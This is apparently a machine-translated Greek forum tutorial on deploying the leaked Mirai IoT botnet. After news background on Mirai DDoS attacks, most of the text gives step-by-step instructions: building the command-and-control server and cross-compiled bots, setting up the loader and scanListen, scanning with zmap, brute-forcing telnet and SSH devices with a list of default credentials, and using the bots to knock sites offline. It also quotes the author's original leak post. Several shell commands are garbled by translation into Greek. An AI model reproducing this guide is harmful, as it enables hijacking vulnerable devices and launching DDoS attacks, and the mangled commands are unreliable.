Πηγαίος κώδικας Mirai. Εγκατάσταση και διαμόρφωση του botnet Mirai. Αρχή λειτουργίας του Mirai
Στον πυρήνα του, το Mirai λειτουργεί απλά: σαρώνει το Διαδίκτυο αναζητώντας συσκευές IoT προσβάσιμες μέσω telnet που είναι ευάλωτες σε ωμή βία και hacking. Το κακόβουλο λογισμικό επιτίθεται κυρίως σε κάμερες παρακολούθησης, DVR και δρομολογητές και στη συνέχεια συνεχίζει να πολλαπλασιάζεται σαν σκουλήκι.
Από επιθέσεις DDoS που πραγματοποιήθηκαν από αυτό το botnet πρόσφατα και το μεγαλύτερο στην Ευρώπη. Η μέγιστη ισχύς επίθεσης έφτασε τα 620 Gbit/s και πάνω από 1 Tb/s. Για να επιτύχουν τέτοια αποτελέσματα, οι επιτιθέμενοι χρησιμοποίησαν πακέτα UDP, DNS και HTTP, καθώς και πακέτα GRE (Generic Routing Encapsulation), τα οποία οι ειδικοί αναγνώρισαν ως πολύ ασυνήθιστα.
Τα συμπεράσματα των ειδικών του MalwareTech γενικά συμπίπτουν με αυτές τις παρατηρήσεις. Έτσι, σε διάστημα δώδεκα ωρών, οι ερευνητές κατέγραψαν περίπου 72.000 μοναδικές διευθύνσεις IP και 4.000 νέες IP εμφανίζονταν κάθε ώρα. Από αυτό, οι αναλυτές κατέληξαν στο συμπέρασμα ότι το μέγεθος του botnet είναι πολύ μέτριο - μόνο περίπου 120.000 συσκευές την ημέρα. Και παρόλο που το botnet είναι πολύ μεγαλύτερο και οι αριθμοί είναι 1-1,5 εκατομμύρια bots, ούτε οι ερευνητές του MalwareTech ούτε οι ειδικοί της Akamai συμφωνούν με αυτό.
«Το Mirai, το οποίο προηγουμένως αγνοούνταν σε μεγάλο βαθμό λόγω της απλότητας των επιθέσεων telnet, έγινε κύριο θέμα συζήτησης στα μέσα ενημέρωσης σε όλο τον κόσμο την περασμένη εβδομάδα, με τις υπηρεσίες επιβολής του νόμου να ξεκινούν έρευνες, με την υποστήριξη πολλών διεθνών εταιρειών», γράφουν οι ερευνητές. . «Είναι πολύ πιθανό οι ισχυρές επιθέσεις DDoS να γίνουν πλέον πιο κοινή πρακτική καθώς οι χάκερ βρίσκουν όλο και πιο ευάλωτες συσκευές IoT ή αρχίζουν να μολύνουν συσκευές που προστατεύονται από NAT. Είναι σίγουρα καιρός οι κατασκευαστές να σταματήσουν να κυκλοφορούν συσκευές με παγκόσμιους κωδικούς πρόσβασης από προεπιλογή και να στραφούν σε συσκευές με κωδικούς πρόσβασης που δημιουργούνται τυχαία στο κάτω μέρος της θήκης."
Εκτός από την αναφορά, οι ερευνητές της MalwareTech έχουν συμπεριλάβει ένα βίντεο που δείχνει έναν χάρτη των μολύνσεων από το Mirai (δείτε παρακάτω). Επίσης στον ιστότοπο των ερευνητών μπορείτε να βρείτε έναν διαδραστικό χάρτη του botnet, ο οποίος ενημερώνεται σε πραγματικό χρόνο.
Θα χρειαστούμε δύο διακομιστές VPS KVM και έναν τομέα. Η εικονικοποίηση είναι KVM, το OpenVZ λείπει αυτή τη φορά.
Παίρνω τους διακομιστές εδώ -
Θα εγκαταστήσουμε το ίδιο το botnet σε έναν διακομιστή και θα σαρώσουμε bot στον δεύτερο. (κτηνώδης)
ΣΠΟΥΔΑΙΟΣ. Οι διακομιστές πρέπει να βασίζονται στο Debian 8 και να διαθέτουν τουλάχιστον 1 GB μνήμης RAM.
Οποιοσδήποτε τομέας, δεν έχει σημασία.
Λυπούμαστε, φυσικά, αλλά δεν θα σας πω πώς να συνδέσετε έναν τομέα σε ένα VPS. Δεν είναι δύσκολο, θα το καταλάβεις μόνος σου.
Στόκοςκαι ας ξεκινήσουμε.
# apt-get update -y
# apt-get αναβάθμιση -y
# apt-get εγκατάσταση unzip gcc golang ηλεκτρικού φράχτη οθόνης sudo git -y
# apt-get εγκατάσταση mysql-server -y
# apt-get εγκατάσταση mysql-client -y
# apt-get install apache2 -y
Κατά την εγκατάσταση της MySQL, θα χρειαστεί να δημιουργήσετε έναν κωδικό πρόσβασης για πρόσβαση στη MySQL για τον χρήστη root. Θα βρείτε έναν κανονικό κωδικό πρόσβασης, χωρίς κανένα "qwerty"
Γράψε το κάπου, θα το χρειαστούμε ξανά.
# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
#βίαιο χτύπημα< <(curl -s -S -L
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
)# gvm εγκατάσταση go1.4
# gvm χρήση go1.4 [--προεπιλογή]
# gvm εγκατάσταση go1.4 -B
# gvm χρησιμοποιήστε το go1.4
# εξαγωγή GOROOT_BOOTSTRAP=$GOROOT
# gvm εγκατάσταση go1.5
# gvm χρησιμοποιήστε το go1.5
# gvm εγκατάσταση go1.8
# gvm χρησιμοποιήστε το go1.8
Αφού εγκαταστήσετε όλα τα βοηθητικά προγράμματα, πραγματοποιήστε λήψη των πηγών bot -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Και ανεβάστε το στον διακομιστή. Ομάδα wget, ή απλά μέσω του προγράμματος WinSCP.
# αποσυμπιέστε το Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc συμβολοσειρά *******(γράφουμε το domain μας, που είναι συνδεδεμένο στον διακομιστή) και πατάμε Enter.
Εδώ θα δείτε το παρακάτω κείμενο -
XOR με 14 byte δεδομένων...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
14 - εδώ θα έχετε διαφορετικό αριθμό, οπότε μην ανησυχείτε, όλα είναι σωστά.
Αντιγράφουμε όλο αυτό το κείμενο.
Άνοιγμα μέσω nano editor ή μέσω WinSCPαρχείο πίνακας.γπου βρίσκεται στο φάκελο mirai/bot
Πρέπει να το δείτε αυτό -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Γραμμή add_entry(TABLE_CNC_DOMAIN- αλλάξτε τα πάντα σε εισαγωγικά στο κείμενό σας που μόλις αντιγράψατε. Αντί " 30 " Γράφουμε τον αριθμό μας, τον οποίο επίσης μόλις αντιγράψαμε. Το ίδιο κάνουμε και με τη γραμμή add_entry(TABLE_SCAN_CB_DOMAIN
Αποθηκεύστε και κλείστε το πρόγραμμα επεξεργασίας.
Ανοίξτε το αρχείο με ένα πρόγραμμα επεξεργασίας mirai/cnc/main.go
Βλέπουμε αυτό -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
"127.0.0.1" αλλάζω σε "127.0.0.1:3306"
"Κωδικός πρόσβασης"Αλλάζουμε τον κωδικό πρόσβασης που πληκτρολογήσαμε νωρίτερα στη MySQL μας. "
Αποθηκεύστε το αρχείο και κλείστε το πρόγραμμα επεξεργασίας.
Απλώς αντιγράψτε όλη αυτή τη βλακεία, δεν θα σας πω γιατί χρειάζεται -
# mkdir /etc/xcompile
# cd /etc/xcompile
#wget
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
#wget
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
#wget
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
#wget
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
#wget
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
#wget
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
#wget
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
#wget
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
#wget
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2
# rm *.tar.bz2
# mv cross-compiler-armv4l armv4l
# mv cross-compiler-i586 i586
#mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv cross-compiler-armv6l armv6l
# εξαγωγή PATH=$PATH:/etc/xcompile/armv4l/bin
# εξαγωγή PATH=$PATH:/etc/xcompile/i586/bin
# εξαγωγή PATH=$PATH:/etc/xcompile/m68k/bin
# εξαγωγή PATH=$PATH:/etc/xcompile/mips/bin
# εξαγωγή PATH=$PATH:/etc/xcompile/mipsel/bin
# εξαγωγή PATH=$PATH:/etc/xcompile/powerpc/bin
# εξαγωγή PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# εξαγωγή PATH=$PATH:/etc/xcompile/sh4/bin
# εξαγωγή PATH=$PATH:/etc/xcompile/sparc/bin
# εξαγωγή PATH=$PATH:/etc/xcompile/armv6l/bin
# εξαγωγή PATH=$PATH:/usr/local/go/bin
# εξαγωγή GOPATH=$HOME/Documents/go
# πηγαίνετε να πάρετε το github.com/go-sql-driver/mysql
# πηγαίνετε να πάρετε το github.com/mattn/go-shellwords
# cd Mirai-Source-Code-master/mirai
# ./build.sh εντοπισμός σφαλμάτων telnet
# ./build.sh απελευθέρωση telnet
# mv mirai* /var/www/html
# cd /var/www/html
#mkdirbins
#mv*bins/
Τώρα MySQL.
# mysql -u root -p
Εδώ θα σας ζητηθεί κωδικός πρόσβασης. Εισαγάγετε τον κωδικό πρόσβασης που ορίσατε προηγουμένως.
# δημιουργία βάσης δεδομένων mirai;
#χρησιμοποιήστε mirai
Τώρα αντιγράψτε όλο το κείμενο από εδώ -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Επικολλήστε το και πατήστε Enter.
Αντιγράψτε το κείμενο από εδώ -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Αντί anna-senpaiγράψτε τη σύνδεσή σας. Οποιος. Το ίδιο και το myawesomepassword. Θα χρειαστούμε αυτά τα δεδομένα για πρόσβαση στον πίνακα ελέγχου του bot.
Θα έπρεπε να είναι έτσι - INSERT INTO ΤΙΜΕΣ χρηστών (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");
Αντιγραφή, επικόλληση, πατήστε Enter.
Τώρα μπορείτε να βγείτε έξω.
Σχεδόν τελείωσε.
# cd Mirai-Source-Code-master/mirai/release
# touch prompt.txt
# οθόνη ./cnc
Πρέπει να δείτε την επιγραφή Άνοιξε το MySQL DB
Δεν κλείνουμε αυτή τη συνεδρία, ανοίγουμε μια νέα.
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Αντί για *******, γράψτε τον τομέα σας και κάντε κλικ στο Άνοιγμα.
Εισαγάγετε το όνομα χρήστη και τον κωδικό πρόσβασής σας, στην περίπτωσή μου είναι -
zaebalsjapisatj
Αυτό είναι όλο, είμαστε στον πίνακα ελέγχου του bot.
Τώρα χρειαζόμαστε bots. Όλα είναι απλά εδώ, δεν χρειάζονται εγκαταστάσεις.
Ας διαμορφώσουμε τον φορτωτή.
Απαιτείται Loader για να μπορούν να προστεθούν bots από αρχεία κειμένου. Ας υποθέσουμε ότι έχουμε δημιουργήσει ένα σωρό συσκευές (δρομολογητές, κάμερες, τηλέφωνα) και για να τις προσθέσουμε στο bot, χρειαζόμαστε ένα loader.
Επίσης ο φορτωτής είναι "σκουλήκι"
Συνδεθείτε στον διακομιστή μας μέσω PuTTY και WinSCP.
Χρησιμοποιώντας το WinSCP βρίσκουμε το αρχείο κύρια.γσε φάκελο Mirai-Source-Code-master/dlr
Γράφουμε την IP του διακομιστή μας όπως στο στιγμιότυπο οθόνης -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Αφήνουμε τα κόμματα, έτσι πρέπει να είναι. Αποθήκευσε και κλείσε.
Τώρα με PyTTYπηγαίνετε στον διακομιστή μας και γράψτε -
# cd Mirai-Source-Code-master/dlr
# chmod 777 *
# ./build.sh
# κυκλοφορία cd
# mv dlr* ~/Mirai-Source-Code-master/loader/bins
Τώρα ας ανοίξουμε WinSCPκαι βρείτε το αρχείο κύρια.γσε φάκελο Mirai-Source-Code-master/loader/src
Το αλλάζουμε στην IP μας όπως στο στιγμιότυπο οθόνης -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Αποθήκευσε και κλείσε.
Διά μέσου Στόκος -
# ./build.sh
Με τη χρήση WinSCPανοίξτε το αρχείο scanListen.goπου μπορείτε να βρείτε στο φάκελο Mirai-Source-Code-master/mirai/tools
Αλλαγή στην IP του διακομιστή σας -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Στη συνέχεια με PyTTY -
# cd Mirai-Source-Code-master/mirai/tools
# πηγαίνετε να δημιουργήσετε scanListen.go
Τώρα έχουμε ένα νέο αρχείο - scanΑκούστε(χωρίς .πηγαίνω, Απλά scanΑκούστε)
scanΑκούστεπρέπει να μετακινηθεί σε φάκελο Mirai-Source-Code-master/loader
Μόνο με βοήθεια WinSCPβάλτε το σε ένα φάκελο φορτωτής
Τώρα ας ελέγξουμε αν όλα λειτουργούν
# ./loader
Αν δείτε τι υπάρχει στην οθόνη, τότε όλα είναι σωστά -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Εάν προκύψουν σφάλματα, γράψτε στο θέμα, θα βοηθήσω.
Για να κάνετε λήψη bots από τη λίστα, αποθέστε το αρχείο κειμένου στο φάκελο φορτωτήςκαι πληκτρολογήστε την εντολή -
# cat list.txt | ./φορτωτής
Αυτό είναι όλο, όλα τα ρομπότ που στρατολογήσατε θα είναι μαζί σας, θα καταρρέουν τοποθεσίες κατόπιν εντολής σας.
Προσωπικά δεν έχω χρησιμοποιήσει αυτή τη μέθοδο, βρήκα έναν ευκολότερο τρόπο.
Εδώ χρειαζόμαστε έναν δεύτερο διακομιστή. Επίσης σε Debian 8.
# apt-get update -y
# apt-get αναβάθμιση -y
# apt-get εγκατάσταση python-paramiko -y
# apt-get εγκατάσταση zmap -y
zmapτο χρειαζόμαστε για σάρωση θυρών. Η αρχή λειτουργίας είναι η ίδια με KPortScan, μόνο 50 φορές πιο γρήγορα.
Αντιγράψτε όλο τον κώδικα από εδώ -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Και αποθηκεύστε ως scan.py
Εδώ μπορείτε να προσθέσετε τους κωδικούς πρόσβασης και τα στοιχεία σύνδεσης -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Σειρά σύνθετομην αγγίζεις!
Εδώ πρέπει να καταχωρίσετε την IP του διακομιστή στον οποίο βρίσκεται το bot -
Πρέπει να είστε εγγεγραμμένος για να δείτε συνδέσμους.
Τα αλλάζουμε όλα και τα σώζουμε.
Αφήνουμε το αρχείο scan.py οπουδήποτε στον διακομιστή μας. Στον δεύτερο διακομιστή, που είναι καθαρά για σάρωση, αυτός στον οποίο δεν ακουμπάμε το bot.
Χρειαζόμαστε IP που θα σαρώσουμε.
#zmap -p22 -o list.txt -B 100M(μπορείτε να σαρώσετε άλλες θύρες, πάντα σάρωνα 22 ή 23)
Όλα τα αποτελέσματα θα βρίσκονται στο αρχείο list.txt
Μετά τη συλλογή του αρχείου IP (όσο περισσότερα τόσο καλύτερα). list.txtρίξτε το δίπλα στο αρχείο scan.pyκαι γράψε -
# python scan.py list.txt 500
Αυτό είναι όλο, καθόμαστε και παρακολουθούμε πώς μεγαλώνει το botnet μας.
Όταν υπάρχουν τουλάχιστον 200 bots, μπορείτε να εκκινήσετε το loader.
Για να το κάνετε αυτό, μεταβείτε στον διακομιστή όπου είναι εγκατεστημένο το botnet και -
# cd Mirai-Source-Code-master/loader
# ulimit -n 9999999
# ./scanListen | ./φορτωτής
Τώρα το bot θα λειτουργεί σαν "σκουλήκι" και θα τελειώσει περισσότερα bots.
Την περασμένη εβδομάδα, διέρρευσε στο διαδίκτυο ο πηγαίος κώδικας για τα στοιχεία του botnet Mirai, που χρησιμοποιούνται σε επιθέσεις DDoS που έσπασαν ρεκόρ με χωρητικότητα έως και 1 Tb/s.
Τέχνη. 273 του Ποινικού Κώδικα της Ρωσικής Ομοσπονδίας. Δημιουργία, χρήση και διανομή κακόβουλων προγραμμάτων υπολογιστή
1. Δημιουργία, διανομή ή χρήση προγραμμάτων ηλεκτρονικών υπολογιστών ή άλλων πληροφοριών υπολογιστή, που εν γνώσει τους προορίζονται για μη εξουσιοδοτημένη καταστροφή, αποκλεισμό, τροποποίηση, αντιγραφή πληροφοριών υπολογιστή ή εξουδετέρωση μέσων προστασίας πληροφοριών υπολογιστή, -
τιμωρείται με περιορισμό της ελευθερίας για περίοδο έως και τέσσερα χρόνια ή καταναγκαστική εργασία για περίοδο έως τέσσερα χρόνια ή φυλάκιση για την ίδια περίοδο με πρόστιμο μέχρι διακόσιες χιλιάδες ρούβλια ή ύψος των αποδοχών ή λοιπών εισοδημάτων του καταδικασθέντος για χρονικό διάστημα μέχρι δεκαοκτώ μήνες.
2. Πράξεις που προβλέπονται στο πρώτο μέρος του παρόντος άρθρου, που διαπράχθηκαν από ομάδα προσώπων με προηγούμενη συνωμοσία ή από οργανωμένη ομάδα ή από άτομο που έκανε χρήση της υπηρεσιακής τους θέσης, καθώς και όσες προκάλεσαν μεγάλη ζημία ή έγιναν από ιδιοτελές συμφέρον. , -
τιμωρείται με περιορισμό της ελευθερίας για περίοδο έως τεσσάρων ετών ή καταναγκαστική εργασία για περίοδο έως πέντε ετών με στέρηση του δικαιώματος κατοχής ορισμένων θέσεων ή άσκησης ορισμένων δραστηριοτήτων για περίοδο έως τριών ετών ή χωρίς αυτό, ή φυλάκιση για περίοδο έως πέντε ετών με πρόστιμο από εκατό χιλιάδες έως διακόσιες χιλιάδες ρούβλια ή στο ποσό των μισθών ή άλλων εισοδημάτων του καταδικασθέντος για περίοδο δύο έως τριών ετών ή χωρίς αυτό και με ή χωρίς στέρηση του δικαιώματος κατοχής ορισμένων θέσεων ή άσκησης ορισμένων δραστηριοτήτων για περίοδο έως τριών ετών.
3. Πράξεις που προβλέπονται στα μέρη ένα ή δύο του παρόντος άρθρου, εάν συνεπάγονται σοβαρές συνέπειες ή απειλούν την πραγματοποίησή τους, -
τιμωρείται με φυλάκιση μέχρι επτά ετών.
Αυτό το botnet αποτελείται κυρίως από κάμερες, συσκευές DVR κ.λπ.
Η μόλυνση συμβαίνει πολύ απλά: το Διαδίκτυο σαρώνεται για ανοιχτές θύρες 80/23 (web/telnet) και επιλέγονται λογαριασμοί με σκληρό κώδικα.
Λίγοι χρήστες αλλάζουν τους κωδικούς πρόσβασης των ενσωματωμένων λογαριασμών τους (αν είναι δυνατόν), έτσι το botnet ανανεώνεται συνεχώς με νέες συσκευές. Εάν μπορείτε να αλλάξετε τον κωδικό πρόσβασης για τη διεπαφή Ιστού ενώ βρίσκεστε σε αυτήν, τότε ο κωδικός πρόσβασης και η ίδια η παρουσία της πρόσβασης telnet απλώς διαφεύγει από πολλούς χρήστες.
Οι πιο συχνά χρησιμοποιούμενοι λογαριασμοί είναι:
enable:system
κέλυφος:sh
admin:διαχειρ
root:xc3511
ρίζα:vizxv
root: admin
root:xmhdipc
root: 123456
root: 888888
υποστήριξη: υποστήριξη
root: 54321
ρίζα: juantech
ρίζα:anko
root: 12345
διαχειριστής:
root:προεπιλογή
admin:password
ρίζα: ρίζα
ρίζα:
χρήστης: χρήστης
admin:smcadmin
root:pass
admin:admin1234
root: 1111
επισκέπτης: 12345
ρίζα: 1234
root:password
root:666666
admin:1111
υπηρεσία: υπηρεσία
root:system
επόπτης: επόπτης
root:klv1234
διαχειριστής: 1234
root:ikwb
root: Zte521
Αφού αποκτήσει πρόσβαση, το κέντρο εντολών λαμβάνει μια δυαδική ειδοποίηση σχετικά με την παρουσία ενός νέου bot:
4a 9a d1 d1 = XXX.XXX.XXX.XXX (η διεύθυνση του κεντρικού υπολογιστή ήταν εδώ)
05 = Πιν
17 = 23 (Θύρα 23 Telnet)
05 = Πιν
61 64 6d 69 6e = username:admin admin
05= Καρτέλα
61 64 6d 69 6e = κωδικός πρόσβασης χρήστη: admin
Τα στοιχεία του botnet έχουν σχεδιαστεί για να λειτουργούν σε διαφορετικά περιβάλλοντα, όπως αποδεικνύεται από τα προσδιορισμένα δείγματα:
mirai.βραχίονα
mirai.arm7
mirai.mips
mirai.ppc
mirai.sh4
Οι διακομιστές εντολών βρίσκονται επί του παρόντος στις ακόλουθες διευθύνσεις:
103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11
Οι οδηγίες για τη δημιουργία ενός botnet είναι αρκετά απλές, ορίστε ως έχουν (πηγή http://pastebin.com/E90i6yBB):
Γεια σε όλους,
Όταν πρωτοπήγα στη βιομηχανία DDoS, δεν σχεδίαζα να μείνω σε αυτήν για πολύ. Έκανα τα χρήματά μου, υπάρχουν πολλά μάτια που κοιτάζουν το IOT τώρα, οπότε ήρθε η ώρα για το GTFO. Ωστόσο, γνωρίζω κάθε ολίσθηση και τη μαμά τους, είναι το όνειρό τους να έχουν κάτι εκτός από το qbot.
Σήμερα, λοιπόν, έχω μια καταπληκτική κυκλοφορία για εσάς. Με το Mirai, συνήθως βγάζω max 380k bots μόνο από το telnet. Ωστόσο, μετά το Kreb DDoS, οι ISP έκλεισαν σιγά σιγά και ξεκαθάρισαν την πράξη τους. Σήμερα, το μέγιστο τράβηγμα είναι περίπου 300.000 bots και πέφτει.
Λοιπόν, είμαι το senpai σου, και θα σου φερθώ πολύ ωραία, hf-chan μου.
Και σε όλους όσους νόμιζαν ότι έκαναν οτιδήποτε χτυπώντας το CNC μου, γέλασα καλά, αυτό το bot χρησιμοποιεί τομέα για CNC. Χρειάζονται 60 δευτερόλεπτα για να επανασυνδεθούν όλα τα bots, lol
Επίσης, φωνάξτε σε αυτήν την ανάρτηση ιστολογίου από το malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Σε σεβόταν πολύ, νόμιζα ότι ήσασταν καλός αντιστροφέας, αλλά πραγματικά απέτυχες εντελώς και τελείως στην αντιστροφή αυτού του δυαδικού αρχείου. "Έχουμε ακόμα καλύτερο κουνγκ φου από εσάς παιδιά" μην με κάνετε να γελάω, κάνατε τόσα πολλά λάθη και μάλιστα μπερδέψατε μερικά διαφορετικά δυαδικά αρχεία με τα δικά μου. χαχαχα
Επιτρέψτε μου να σας δώσω μερικά χαστούκια-
1) η θύρα 48101 δεν είναι για σύνδεση πίσω, είναι για έλεγχο για την αποτροπή πολλαπλών περιπτώσεων ρομπότ που εκτελούνται μαζί
2) Τα /dev/watchdog και /dev/misc δεν είναι για να «κάνουν την καθυστέρηση», αλλά για να εμποδίσουν το σύστημα να κολλήσει. Αυτό είναι φρούτο που κρέμεται χαμηλά, τόσο λυπηρό που είσαι εξαιρετικά χαζός
3) Απέτυχες και νόμιζες ότι το FAKE_CNC_ADDR και το FAKE_CNC_PORT ήταν πραγματικό CNC, lol "Και κάνω την κερκόπορτα για σύνδεση μέσω HTTP στις 65.222.202.53." σκοντάφτεις από τη ροή του σήματος ;) προσπαθήστε πιο σκληρά
4) Το εργαλείο σκελετού σας ρουφάει τον κώλο, νόμιζε ότι ο αποκωδικοποιητής επίθεσης ήταν "στυλ sinden", αλλά δεν χρησιμοποιεί καν πρωτόκολλο που βασίζεται σε κείμενο; Το CNC και το bot επικοινωνούν μέσω δυαδικού πρωτοκόλλου
5) λες ‘chroot(“/”) τόσο προβλέψιμο σαν torlus’ αλλά δεν καταλαβαίνεις, κάποιοι άλλοι σκοτώνουν με βάση το cwd. Δείχνει πόσο ασυνήθιστος είστε με πραγματικό κακόβουλο λογισμικό. Επιστρέψτε στο skidland
Γιατί γράφετε εργαλεία αντίστροφης μηχανικής; Δεν μπορείτε καν να αντιστρέψετε σωστά εξαρχής. Μάθετε πρώτα κάποιες δεξιότητες πριν προσπαθήσετε να εντυπωσιάσετε άλλους. Η αλαζονεία σου που δηλώνεις πώς με «χτύπησες» με τη χαζή σου δήλωση κουνγκ-φου με έκανε να γελάσω τόσο δυνατά ενώ έτρωγα το SO μου έπρεπε να με χτυπήσει στην πλάτη.
Όπως εγώ θα είμαι για πάντα ελεύθερος, εσύ θα είσαι για πάντα καταδικασμένος σε μετριότητα.
Απαιτήσεις
2 διακομιστές: 1 για CNC + mysql, 1 για δέκτη σάρωσης και 1+ για φόρτωση
Απαιτήσεις ΕΠ
2 VPS και 4 διακομιστές
— 1 VPS με εξαιρετικά αλεξίσφαιρο κεντρικό υπολογιστή για διακομιστή βάσης δεδομένων
— 1 VPS, με rootkit, για δέκτη σάρωσης και διανομέα
— 1 διακομιστής για CNC (χρησιμοποιείται όπως 2% CPU με 400.000 bots)
— Διακομιστές NForce 3x 10gbps για φόρτωση (ο διανομέας διανέμει εξίσου σε 3 διακομιστές)
— Για τη δημιουργία σύνδεσης με το CNC, τα bots επιλύουν έναν τομέα (resolv.c/resolv.h) και συνδέονται σε αυτήν τη διεύθυνση IP
— Τα bots βλάπτουν το telnet χρησιμοποιώντας έναν προηγμένο σαρωτή SYN που είναι περίπου 80 φορές ταχύτερος από αυτόν του qbot και χρησιμοποιεί σχεδόν 20 φορές λιγότερους πόρους. Όταν βρίσκει ένα βίαιο αποτέλεσμα, το bot επιλύει έναν άλλο τομέα και το αναφέρει. Αυτό είναι συνδεδεμένο σε έναν ξεχωριστό διακομιστή για να φορτώνεται αυτόματα σε συσκευές καθώς έρχονται τα αποτελέσματα.
— Τα αποτελέσματα bruted αποστέλλονται από προεπιλογή στη θύρα 48101. Το βοηθητικό πρόγραμμα που ονομάζεται scanListen.go στα εργαλεία χρησιμοποιείται για τη λήψη βυθισμένων αποτελεσμάτων (έπαιρνα περίπου 500 bruted αποτελέσματα ανά δευτερόλεπτο στο μέγιστο). Εάν κάνετε δημιουργία σε λειτουργία εντοπισμού σφαλμάτων, θα πρέπει να δείτε το δυαδικό βοηθητικό πρόγραμμα scanListen να εμφανίζεται στον φάκελο εντοπισμού σφαλμάτων.
Το Mirai χρησιμοποιεί έναν μηχανισμό εξάπλωσης παρόμοιο με αυτό της αυτο-επανάληψης, αλλά αυτό που αποκαλώ "φόρτωση σε πραγματικό χρόνο". Βασικά, τα ρομπότ βυθίζονται τα αποτελέσματα, τα στέλνουν σε έναν διακομιστή που ακούει με το βοηθητικό πρόγραμμα scanListen, το οποίο στέλνει τα αποτελέσματα στον φορτωτή. Αυτός ο βρόχος (brute -> scanListen -> load -> brute) είναι γνωστός ως φόρτωση σε πραγματικό χρόνο.
Ο φορτωτής μπορεί να ρυθμιστεί ώστε να χρησιμοποιεί πολλαπλές διευθύνσεις IP για να παρακάμπτεται η εξάντληση θύρας στο linux (υπάρχει περιορισμένος αριθμός διαθέσιμων θυρών, πράγμα που σημαίνει ότι δεν υπάρχει αρκετή ποικιλία σε πλειάδα για να ληφθούν περισσότερες από 65 χιλιάδες ταυτόχρονες εξερχόμενες συνδέσεις — θεωρητικά, αυτή η παρτίδα τιμής πιο λιγο). Θα είχα ίσως 60k — 70k ταυτόχρονες εξερχόμενες συνδέσεις (ταυτόχρονη φόρτωση) κατανεμημένες σε 5 IP.
Το bot έχει πολλές επιλογές διαμόρφωσης που είναι ασαφείς στο (table.c/table.h). Στο ./mirai/bot/table.h μπορείςβρείτε τις περισσότερες περιγραφές για τις επιλογές διαμόρφωσης. Ωστόσο, στο ./mirai/bot/table.c υπάρχουν μερικές επιλογές που *πρέπει* να αλλάξετε για να δουλέψετε.
— TABLE_CNC_DOMAIN — Όνομα τομέα του CNC για σύνδεση — Η αποφυγή DDoS είναι πολύ διασκεδαστική με το mirai, οι άνθρωποι προσπαθούν να χτυπήσουν το CNC μου, αλλά το ενημερώνω πιο γρήγορα από ό,τι μπορούν να βρουν νέες IP, lol. Καθυστερήσεις :)
— TABLE_CNC_PORT — Θύρα προς σύνδεση, έχει ήδη οριστεί σε 23
— TABLE_SCAN_CB_DOMAIN — Κατά την εύρεση ωμών αποτελεσμάτων, αυτός ο τομέας αναφέρεται σε
— TABLE_SCAN_CB_PORT — Θύρα στην οποία πρέπει να συνδεθείτε για βίαια αποτελέσματα, έχει ήδη οριστεί στο 48101.
Στο ./mirai/tools θα βρείτε κάτι που ονομάζεται enc.c — Πρέπει να το μεταγλωττίσετε για να εξάγετε πράγματα που θα βάλετε στο αρχείο table.c
Εκτελέστε μέσα σε αυτόν τον κατάλογο Mirai
./build.sh εντοπισμός σφαλμάτων telnet
Θα λάβετε ορισμένα σφάλματα που σχετίζονται με τη μη ύπαρξη cross-compilers εάν δεν τους έχετε ρυθμίσει. Αυτό είναι εντάξει, δεν θα επηρεάσει τη μεταγλώττιση του εργαλείου enc
